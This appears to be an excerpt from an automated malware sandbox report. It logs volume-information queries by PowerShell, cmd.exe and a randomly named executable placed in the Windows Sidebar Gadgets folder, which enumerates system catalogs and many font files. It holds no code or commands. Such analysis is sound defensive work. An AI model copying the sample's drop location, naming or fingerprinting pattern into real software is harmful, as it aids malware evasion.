                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
